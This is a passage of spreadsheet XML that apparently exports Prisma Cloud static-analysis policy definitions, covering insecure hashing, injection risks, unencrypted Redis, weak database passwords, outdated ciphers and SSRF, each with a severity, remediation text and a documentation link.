      <c r="AE379" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF379" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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79" t="inlineStr">
        <is>
          <t>f82dfea4-ee42-440b-bafd-441385e69c1c</t>
        </is>
      </c>
      <c r="AI379" t="inlineStr"/>
      <c r="AJ379" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK379" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="380">
      <c r="A380" t="inlineStr"/>
      <c r="B380" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C380" s="2" t="inlineStr"/>
      <c r="D380" t="inlineStr"/>
      <c r="E380" t="inlineStr"/>
      <c r="F380" t="inlineStr"/>
      <c r="G380" t="b">
        <v>1</v>
      </c>
      <c r="H3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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J380" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K380" t="inlineStr">
        <is>
          <t>Ensure superuser port is not set</t>
        </is>
      </c>
      <c r="L380" t="inlineStr"/>
      <c r="M380" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N380" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O380" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P380" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q380" t="inlineStr"/>
      <c r="R380" t="inlineStr"/>
      <c r="S380" t="inlineStr"/>
      <c r="T380" t="b">
        <v>0</v>
      </c>
      <c r="U380" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V380" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W380" t="inlineStr">
        <is>
          <t>module setting superuser port</t>
        </is>
      </c>
      <c r="X380" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-36</t>
        </is>
      </c>
      <c r="Y380" t="inlineStr"/>
      <c r="Z380" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA380" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB380" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC380" t="inlineStr">
        <is>
          <t>CKV3_SAST_36</t>
        </is>
      </c>
      <c r="AD380" t="b">
        <v>1</v>
      </c>
      <c r="AE380" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF380" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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0" t="inlineStr">
        <is>
          <t>968f825e-4d62-49f9-b018-3c97e71bc6ba</t>
        </is>
      </c>
      <c r="AI380" t="inlineStr"/>
      <c r="AJ380" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK380" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="381">
      <c r="A381" t="inlineStr"/>
      <c r="B381" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C381" s="2" t="inlineStr"/>
      <c r="D381" t="inlineStr"/>
      <c r="E381" t="inlineStr"/>
      <c r="F381" t="inlineStr"/>
      <c r="G381" t="b">
        <v>1</v>
      </c>
      <c r="H3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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J381" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K381" t="inlineStr">
        <is>
          <t>Usage of weak MD5 hashing algorithm</t>
        </is>
      </c>
      <c r="L381" t="inlineStr"/>
      <c r="M381" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N381" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O381" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P381" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q381" t="inlineStr"/>
      <c r="R381" t="inlineStr"/>
      <c r="S381" t="inlineStr"/>
      <c r="T381" t="b">
        <v>0</v>
      </c>
      <c r="U381" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V381" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W381" t="inlineStr">
        <is>
          <t>This policy identifies the use of the MD5 hashing algorithm from the crypto/md5 package in Go applications. The MD5 algorithm is cryptographically broken and vulnerable to producing collisions, making it unsuitable for secure hashing. It is recommended to use stronger, modern hashing algorithms instead.</t>
        </is>
      </c>
      <c r="X381" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/golang-policies/sast-policy-240</t>
        </is>
      </c>
      <c r="Y381" t="inlineStr"/>
      <c r="Z381" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA381" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB381" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC381" t="inlineStr">
        <is>
          <t>CKV3_SAST_240</t>
        </is>
      </c>
      <c r="AD381" t="b">
        <v>1</v>
      </c>
      <c r="AE381" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF381" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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1" t="inlineStr">
        <is>
          <t>d07e6be3-7467-4f15-8c9e-4b599adb6730</t>
        </is>
      </c>
      <c r="AI381" t="inlineStr"/>
      <c r="AJ381" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK381" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="382">
      <c r="A382" t="inlineStr"/>
      <c r="B382" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C382" s="2" t="inlineStr"/>
      <c r="D382" t="inlineStr"/>
      <c r="E382" t="inlineStr"/>
      <c r="F382" t="inlineStr"/>
      <c r="G382" t="b">
        <v>1</v>
      </c>
      <c r="H3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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J382" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K382" t="inlineStr">
        <is>
          <t>Dynamic code execution (vulnerable to injection attacks)</t>
        </is>
      </c>
      <c r="L382" t="inlineStr"/>
      <c r="M382" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N382" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O382" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P382" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q382" t="inlineStr"/>
      <c r="R382" t="inlineStr"/>
      <c r="S382" t="inlineStr"/>
      <c r="T382" t="b">
        <v>0</v>
      </c>
      <c r="U382" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V382" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W382" t="inlineStr">
        <is>
          <t>Detected unsafe code execution</t>
        </is>
      </c>
      <c r="X382" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-87</t>
        </is>
      </c>
      <c r="Y382" t="inlineStr"/>
      <c r="Z382" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA382" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB382" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC382" t="inlineStr">
        <is>
          <t>CKV3_SAST_87</t>
        </is>
      </c>
      <c r="AD382" t="b">
        <v>1</v>
      </c>
      <c r="AE382" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF382" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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2" t="inlineStr">
        <is>
          <t>152a5fba-69ab-4048-8e92-adf4abc626e9</t>
        </is>
      </c>
      <c r="AI382" t="inlineStr"/>
      <c r="AJ382" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK382" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="383">
      <c r="A383" t="inlineStr"/>
      <c r="B383" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C383" s="2" t="inlineStr"/>
      <c r="D383" t="inlineStr"/>
      <c r="E383" t="inlineStr"/>
      <c r="F383" t="inlineStr"/>
      <c r="G383" t="b">
        <v>1</v>
      </c>
      <c r="H3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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J383" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K383" t="inlineStr">
        <is>
          <t>Logging vulnerable to injection attacks</t>
        </is>
      </c>
      <c r="L383" t="inlineStr"/>
      <c r="M383" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N383" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O383" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P383" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q383" t="inlineStr"/>
      <c r="R383" t="inlineStr"/>
      <c r="S383" t="inlineStr"/>
      <c r="T383" t="b">
        <v>0</v>
      </c>
      <c r="U383" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V383" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W383" t="inlineStr">
        <is>
          <t>Logging should not be vulnerable to injection attacks.</t>
        </is>
      </c>
      <c r="X383" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-62</t>
        </is>
      </c>
      <c r="Y383" t="inlineStr"/>
      <c r="Z383" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA383" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB383" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC383" t="inlineStr">
        <is>
          <t>CKV3_SAST_62</t>
        </is>
      </c>
      <c r="AD383" t="b">
        <v>1</v>
      </c>
      <c r="AE383" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF383" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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3" t="inlineStr">
        <is>
          <t>b2412440-9731-467c-bf21-9058ca1c3bba</t>
        </is>
      </c>
      <c r="AI383" t="inlineStr"/>
      <c r="AJ383" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK383" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="384">
      <c r="A384" t="inlineStr"/>
      <c r="B384" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C384" s="2" t="inlineStr"/>
      <c r="D384" t="inlineStr"/>
      <c r="E384" t="inlineStr"/>
      <c r="F384" t="inlineStr"/>
      <c r="G384" t="b">
        <v>1</v>
      </c>
      <c r="H3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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J384" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K384" t="inlineStr">
        <is>
          <t>Redis configuration without SSL</t>
        </is>
      </c>
      <c r="L384" t="inlineStr"/>
      <c r="M384" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N384" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O384" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P384" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q384" t="inlineStr"/>
      <c r="R384" t="inlineStr"/>
      <c r="S384" t="inlineStr"/>
      <c r="T384" t="b">
        <v>0</v>
      </c>
      <c r="U384" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V384" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W384" t="inlineStr">
        <is>
          <t>Detected a Redis client configured to communicate without transport security. Do not deploy to production with this as it will leak sensitive information. Instead, consider setting `ssl` to `True` and use `ssl_ca_path`, `ssl_ca_certs`, or `ssl_ca_data` as needed to specify trusted CA certificates. Avoid using `redis://` when creating a client `from_url`.</t>
        </is>
      </c>
      <c r="X384" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-187</t>
        </is>
      </c>
      <c r="Y384" t="inlineStr"/>
      <c r="Z384" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA384" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB384" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC384" t="inlineStr">
        <is>
          <t>CKV3_SAST_187</t>
        </is>
      </c>
      <c r="AD384" t="b">
        <v>1</v>
      </c>
      <c r="AE384" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF384" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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4" t="inlineStr">
        <is>
          <t>da1029bb-71f7-47d5-895e-0323bd4f9bd9</t>
        </is>
      </c>
      <c r="AI384" t="inlineStr"/>
      <c r="AJ384" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK384" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="385">
      <c r="A385" t="inlineStr"/>
      <c r="B385" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C385" s="2" t="inlineStr"/>
      <c r="D385" t="inlineStr"/>
      <c r="E385" t="inlineStr"/>
      <c r="F385" t="inlineStr"/>
      <c r="G385" t="b">
        <v>1</v>
      </c>
      <c r="H3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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J385" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K385" t="inlineStr">
        <is>
          <t>Ensure Usage of JWT Algo</t>
        </is>
      </c>
      <c r="L385" t="inlineStr"/>
      <c r="M385" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N385" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O385" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P385" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q385" t="inlineStr"/>
      <c r="R385" t="inlineStr"/>
      <c r="S385" t="inlineStr"/>
      <c r="T385" t="b">
        <v>0</v>
      </c>
      <c r="U385" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V385" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W385" t="inlineStr">
        <is>
          <t>Ensure that when using JWT the payload of the token is cryptographically encrypted</t>
        </is>
      </c>
      <c r="X385" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-146</t>
        </is>
      </c>
      <c r="Y385" t="inlineStr"/>
      <c r="Z385" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA385" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB385" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC385" t="inlineStr">
        <is>
          <t>CKV3_SAST_146</t>
        </is>
      </c>
      <c r="AD385" t="b">
        <v>1</v>
      </c>
      <c r="AE385" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF385" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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5" t="inlineStr">
        <is>
          <t>4feb0029-74b0-430c-b2af-289cebac84fd</t>
        </is>
      </c>
      <c r="AI385" t="inlineStr"/>
      <c r="AJ385" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK385" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="386">
      <c r="A386" t="inlineStr"/>
      <c r="B386" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C386" s="2" t="inlineStr"/>
      <c r="D386" t="inlineStr"/>
      <c r="E386" t="inlineStr"/>
      <c r="F386" t="inlineStr"/>
      <c r="G386" t="b">
        <v>1</v>
      </c>
      <c r="H3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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J386" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K386" t="inlineStr">
        <is>
          <t>Insecure use of no password or weak password when connecting to a database</t>
        </is>
      </c>
      <c r="L386" t="inlineStr"/>
      <c r="M386" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N386" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O386" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P386" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q386" t="inlineStr"/>
      <c r="R386" t="inlineStr"/>
      <c r="S386" t="inlineStr"/>
      <c r="T386" t="b">
        <v>0</v>
      </c>
      <c r="U386" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V386" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W386" t="inlineStr">
        <is>
          <t>The misuse of a password, or the use of an empty one, is not secure</t>
        </is>
      </c>
      <c r="X386" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-71</t>
        </is>
      </c>
      <c r="Y386" t="inlineStr"/>
      <c r="Z386" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA386" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB386" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC386" t="inlineStr">
        <is>
          <t>CKV3_SAST_71</t>
        </is>
      </c>
      <c r="AD386" t="b">
        <v>1</v>
      </c>
      <c r="AE386" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF386" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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6" t="inlineStr">
        <is>
          <t>eedadf8a-2ce2-404a-8859-5ce77756031f</t>
        </is>
      </c>
      <c r="AI386" t="inlineStr"/>
      <c r="AJ386" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK386" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="387">
      <c r="A387" t="inlineStr"/>
      <c r="B387" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C387" s="2" t="inlineStr"/>
      <c r="D387" t="inlineStr"/>
      <c r="E387" t="inlineStr"/>
      <c r="F387" t="inlineStr"/>
      <c r="G387" t="b">
        <v>1</v>
      </c>
      <c r="H3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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J387" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K387" t="inlineStr">
        <is>
          <t>Prevent Complex/Formatted SQL Queries</t>
        </is>
      </c>
      <c r="L387" t="inlineStr"/>
      <c r="M387" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N387" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O387" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P387" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q387" t="inlineStr"/>
      <c r="R387" t="inlineStr"/>
      <c r="S387" t="inlineStr"/>
      <c r="T387" t="b">
        <v>0</v>
      </c>
      <c r="U387" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V387" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W387" t="inlineStr">
        <is>
          <t>Complex or formatted SQL queries increase the risk of SQL injection. It's advised to avoid these and opt for safer alternatives like parameterized queries, prepared statements, or ORM frameworks. Ensure that no query uses direct concatenation of untrusted values.</t>
        </is>
      </c>
      <c r="X387" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-83</t>
        </is>
      </c>
      <c r="Y387" t="inlineStr"/>
      <c r="Z387" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA387" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB387" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC387" t="inlineStr">
        <is>
          <t>CKV3_SAST_83</t>
        </is>
      </c>
      <c r="AD387" t="b">
        <v>1</v>
      </c>
      <c r="AE387" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF387" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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7" t="inlineStr">
        <is>
          <t>a48a5fcb-1e50-4f82-9096-9105a84aecf9</t>
        </is>
      </c>
      <c r="AI387" t="inlineStr"/>
      <c r="AJ387" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK387" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="388">
      <c r="A388" t="inlineStr"/>
      <c r="B388" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C388" s="2" t="inlineStr"/>
      <c r="D388" t="inlineStr"/>
      <c r="E388" t="inlineStr"/>
      <c r="F388" t="inlineStr"/>
      <c r="G388" t="b">
        <v>1</v>
      </c>
      <c r="H3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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J388" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K388" t="inlineStr">
        <is>
          <t>Path injection</t>
        </is>
      </c>
      <c r="L388" t="inlineStr"/>
      <c r="M388" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N388" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O388" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P388" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q388" t="inlineStr"/>
      <c r="R388" t="inlineStr"/>
      <c r="S388" t="inlineStr"/>
      <c r="T388" t="b">
        <v>0</v>
      </c>
      <c r="U388" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V388" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W388" t="inlineStr">
        <is>
          <t>Detected an vulnerable to function calls with path injection</t>
        </is>
      </c>
      <c r="X388" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-86</t>
        </is>
      </c>
      <c r="Y388" t="inlineStr"/>
      <c r="Z388" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA388" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB388" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC388" t="inlineStr">
        <is>
          <t>CKV3_SAST_86</t>
        </is>
      </c>
      <c r="AD388" t="b">
        <v>1</v>
      </c>
      <c r="AE388" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF388" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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8" t="inlineStr">
        <is>
          <t>429ae701-b1af-43a6-ad1b-0e159a717ecf</t>
        </is>
      </c>
      <c r="AI388" t="inlineStr"/>
      <c r="AJ388" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK388" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="389">
      <c r="A389" t="inlineStr"/>
      <c r="B389" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C389" s="2" t="inlineStr"/>
      <c r="D389" t="inlineStr"/>
      <c r="E389" t="inlineStr"/>
      <c r="F389" t="inlineStr"/>
      <c r="G389" t="b">
        <v>1</v>
      </c>
      <c r="H3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89" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J389" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K389" t="inlineStr">
        <is>
          <t>Encryption algorithms should be used with secure mode and padding scheme</t>
        </is>
      </c>
      <c r="L389" t="inlineStr"/>
      <c r="M389" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N389" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O389" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P389" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q389" t="inlineStr"/>
      <c r="R389" t="inlineStr"/>
      <c r="S389" t="inlineStr"/>
      <c r="T389" t="b">
        <v>0</v>
      </c>
      <c r="U389" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V389" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W389" t="inlineStr">
        <is>
          <t>Encryption algorithms should be used with secure mode and padding scheme. Detected RC2/DES cipher algorithm which is considered insecure. The algorithm has known vulnerabilities and is difficult to use securely. Use AES instead.</t>
        </is>
      </c>
      <c r="X389" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-59</t>
        </is>
      </c>
      <c r="Y389" t="inlineStr"/>
      <c r="Z389" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA389" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB389" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC389" t="inlineStr">
        <is>
          <t>CKV3_SAST_59</t>
        </is>
      </c>
      <c r="AD389" t="b">
        <v>1</v>
      </c>
      <c r="AE389" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF389" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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89" t="inlineStr">
        <is>
          <t>7e0e8097-68a8-4ab7-b5ba-c01fc77cec9d</t>
        </is>
      </c>
      <c r="AI389" t="inlineStr"/>
      <c r="AJ389" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK389" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="390">
      <c r="A390" t="inlineStr"/>
      <c r="B390" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C390" s="2" t="inlineStr"/>
      <c r="D390" t="inlineStr"/>
      <c r="E390" t="inlineStr"/>
      <c r="F390" t="inlineStr"/>
      <c r="G390" t="b">
        <v>1</v>
      </c>
      <c r="H3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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J390" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K390" t="inlineStr">
        <is>
          <t>Unvalidated request construction leading to SSRF risk</t>
        </is>
      </c>
      <c r="L390" t="inlineStr"/>
      <c r="M390" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N390" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
